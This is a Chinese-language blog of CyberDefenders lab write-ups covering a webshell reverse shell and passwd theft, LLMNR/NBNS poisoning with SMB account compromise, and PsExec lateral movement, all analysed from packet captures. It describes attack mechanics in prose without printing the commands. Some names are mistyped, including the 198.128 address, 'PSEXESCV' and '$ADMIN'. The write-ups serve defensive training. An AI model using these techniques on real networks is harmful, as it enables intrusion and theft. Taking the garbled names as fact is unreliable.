Cyberdefenders刷题专用blog

#1 webstrike（和webshell相关的数据泄露，考察http的相关知识）

场景：An anomaly was discovered within our company's intranet as our Development team found an unusual file on one of our web servers. Suspecting potential malicious activity, the network team has prepared a pcap file with critical network traffic for analysis for the security team, and you have been tasked with analyzing the pcap.

就是说，公司在服务器上发现了异常文件，怀疑是个webshell，你需要分析这个webshell

问题1：

Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?

这问的是攻击来源。那我们从webshell本身入手，先找到webshell。

发现了这个。

然后来看一看恶意代码本身的内容。

删除一个/tmp/f，建立一个fifo管道文件。然后把fifo的内容输入shell执行，执行结果发给117.11.88.124，然后这个IP的输入再重定向到管道文件，这样就是一个循环。从该IP发送命令到管道文件，再在shell执行，执行后结果返回到IP，实现了这个IP和服务器的交互，也就实现了远程控制。（关于fifo的知识点我不太明白。）所以这个IP就是黑客的IP。查询可知该IP为天津IP。攻击来自天津。

问题2： Knowing the attacker's user-agent assists in creating robust filtering rules. What's the attacker's user agent?

问user-agent直接在这个webshell的包里面复制粘贴就行，很简单。

它可以反映出对面用的什么操作系统和浏览器。

问题3：We need to identify if there were potential vulnerabilities exploited. What's the name of the malicious web shell uploaded?

问的是webshell叫什么？

那我们看看请求体就行，那里有标注filename=image.jpg.php，就是这个。

唯一要注意的题目问的是成功上传的，前面有个上传失败的image.php不用管

问题4： Knowing the directory where files uploaded are stored is important for reinforcing defenses against unauthorized access. Which directory is used by the website to store the uploaded files?

问上传到服务器的文件存在哪里？

那么我们找找webshell存在哪里就行。

在http的流量里面翻一下，找到了webshell所在的位置。这也就是上传文件所在的位置，答案是/review/upload/

问题5：Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?

端口在shell里面有，8080

问题6： Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?

问的是泄露了什么文件。那我们在webshell上传后的流量里面找，然后能发现这个

curl -X 是用来处理http的。黑客利用该命令发送了passwd文件到自己的电脑。说明其窃取的文件为passwd

#2PoisonedCredentials(中间人攻击or响应伪造，考察NeBIOS,SMB和LLMNR有关的知识)

总结：LLMNR位于应用层的协议，是计算机和计算机连接时使用的。当A与B连接的时候A只知道B的主机名，那么A就会开启广播，等待其他知道的计算机响应，响应后发回IP地址，A根据这个IP和B连接。

NetBIOS是应用层的接口，作用和LLMNR类似，但是其并非一种协议，全称NetBIOS Network Service,wireshark里面写作NBNS，当计算机A只知道NetBIOS名称时，A将请求查询该名称的IP，相当于LLMNR的广播，B响应后一样发出自己的IP，A,B由此连接。

LLMNR攻击就是当A发出广播的时候，攻击者C用自己的计算机响应，并给A发去IP，那么A和C就连接上了，这样C就可以对A操作了

NetBIOS攻击同理。

SMB主要是计算机之间用来传输文件的。

看题。问题1： In the context of the incident described in the scenario, the attacker initiated their actions by taking advantage of benign network traffic from legitimate machines. Can you identify the specific mistyped query made by the machine with the IP address 192.168.232.162?

大概就是说192.168.232.162这个计算机查询了什么东西。他这里的查询指的是NetBIOS的查询，那我们直接找来自这个IP的NBNS流量，SMB流量则根本找不到，然后我们发现，他查询了这个

也就是说，他查询了fileshaare

问题2：We are investigating a network security incident. For a thorough investigation, we need to determine the IP address of the rogue machine. What is the IP address of the machine acting as the rogue entity?

问恶意计算机的IP，由背景知道，计算机发动LLMNR和NetBIOS攻击，那么其应该伪造了响应，也就是说我们找到伪造响应的就可以了，我们直接看看llmnr流量，由上一题知道，192.168.232.162这个是良民，224.0.0.252是广播节点，192.168.232.162广播问(query)谁知道fileshaare，然后192.168.232.215回应（query response）说：“我知道！”我就是。

然后又来一个198.128.232.176问谁知道prinetr，然后这个192.168.232.215又回应说，“我就是prinetr！”但是，215不可能同时拥有两个名字，所以215一定是恶意计算机。

问题3： During our investigation, it's crucial to identify all affected machines. What is the IP address of the second machine that received poisoned responses from the rogue machine?

问你第二个收到恶意响应的是谁？这个上一题解出来了，是198.128.232.176

We suspect that user accounts may have been compromised. To assess this, we must determine the username associated with the compromised account. What is the username of the account that the attacker compromised?

这次问的是，215入侵的账户账户名叫什么？账户应该是SMB的账户，所以这次看SMB流量。215的入侵，所以源头为215，找SMB流量，发现这个

所以答案为janesmith

问题5： As part of our investigation, we aim to understand the extent of the attacker's activities. What is the hostname of the machine that the attacker accessed via SMB?

问的是黑客通过SMB入侵的主机主机名是？那上一题我们知道是176被入侵，这里其实没说清楚，主机名指的是NetBIOS computer name，是主机在局域网的名称，而不是通用意义上的host name，那思路就是，既然215入侵176，那它应当由经过了NBNS的接口，当然也就要知道176的NetBIOS才可以建立连接，那215和176的通信数据包中应该包含176的NetBIOS。注意，这里并没有什么查询行为，或者说利用二者的nbns接口来找出176的NetBIOS computer name，总之最后找到了这个，答案为ACCOUNTINGPC

#3PsExec Hunt

问题1：
In order to effectively trace the attacker's activities within our network, can you determine the IP address of the machine where the attacker initially gained access?

题目问黑客首先攻入了哪台计算机。

思路是既然涉及到PsExec攻击，这种攻击基于SMB协议，那直接过滤smb2，此时发现了，只有10.0.0.130有入侵10.0.0.133的行为，那黑客首个攻入10.0.0.133？不对。因为这是内网机器入侵内网机器，所以黑客应该先攻入10.0.0.130，答案为10.0.0.130

To fully comprehend the extent of the breach, can you determine the machine's hostname to which the attacker first pivoted?

问黑客首先转入向的计算机名称。也就是10.0.0.133的NetBIOS computername。问接口的话，当然要在连接的地方看看，也就是10.0.0.130发出的request。然后发现了这个

答案为SALES-PC

问题3：
After identifying the initial entry point, it's crucial to understand how far the attacker has moved laterally within our network. Knowing the username of the account the attacker used for authentication will give us insights into the extent of the breach. What is the username utilized by the attacker for authentication?

问的是黑客用了什么用户名登录，上面问题1的图片已经有提到ssales

问题4：After figuring out how the attacker moved within our network, we need to know what they did on the target machine. What's the name of the service executable the attacker set up on the target?

问的是黑客在靶机上启用了什么服务？黑客入侵后先查询了133网络相关的信息，然后访问了$ADMIN这个网络共享，并且安装了PSEXESCV这个服务。所以PSEXESCV就是黑客启用的服务

问题5：We need to know how the attacker installed the service on the compromised machine to understand the attacker's lateral movement tactics. This can help identify other affected systems. Which network share was used by PsExec to install the service on the target machine?

问的是黑客在哪里安装的服务，上文提到了是$ADMIN

问题6：
We must identify the network share used to communicate between the two machines. Which network share did PsExec use for communication?

问的是黑客用哪个网络共享给PsExec交流？可以看到黑客在$IPC这个共享下创造了一个名为PSEXESCV的路径并用它来储存133的标准输入和输出（133的hostname就是HR-PC）

问题7：

Now that we have a clearer picture of the attacker's activities on the compromised machine, it's important to identify any further lateral movement. What is the machine's hostname to which the attacker attempted to pivot within our network?

问的是黑客试图转向的计算机的NetBIOS computer name是什么？

由图片可以知道，黑客不仅打入了133，还试图打入10.0.0.131，前几次失败，一直到黑客使用了./IEUser的用户名的时候，找到成功的那一次连接，然后翻一下，发现了这个

所以131的NetBIOS是MARKETING-PC